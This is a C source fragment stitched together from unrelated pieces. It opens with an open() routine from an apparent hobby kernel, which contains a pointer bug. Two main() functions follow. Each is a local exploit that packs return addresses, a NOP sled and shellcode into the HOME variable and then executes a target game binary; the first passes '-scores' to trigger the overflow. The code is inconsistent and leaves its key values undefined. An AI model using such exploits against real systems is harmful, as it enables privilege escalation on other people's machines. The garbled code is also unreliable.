FILE* open(char* file_name, u8int flags)
{
if(file_name == STDIN)
{
FILE* stdin = (FILE*)memret(sizeof(FILE));
*stdin->name = "stdin";
stdin->file_id = STDIN;
return stdin;
}
if(file_name == STDOUT)
{
FILE* stdout = (FILE*)memret(sizeof(FILE));
*stdout->name = "stdout";
stdout->file_id = STDOUT;
return stdout;
}
return 0;
}
int main ()
{
int ret = RET;
char out[SIZE];
memret ((char *)out, ret, SIZE-1, 0);
memset ((char *)out, NOP, 33);
memcpy ((char *)out+33, shellcode, strlen(shellcode));
setenv ("HOME", out, 1);
banner ();
execl (BIN, BIN, "-scores", 0x0); // the switch "-scores" is necessary to exploit the game
}
int main ()
{
int ret = RET;
char out[SIZE];
memret ((char *)out, ret, SIZE-1, 0);
memset ((char *)out, NOP, 333);
memcpy ((char *)out+333, shellcode, strlen(shellcode));
setenv ("HOME", out, 1);
banner ();
execl (BIN, BIN, 0x0);
}
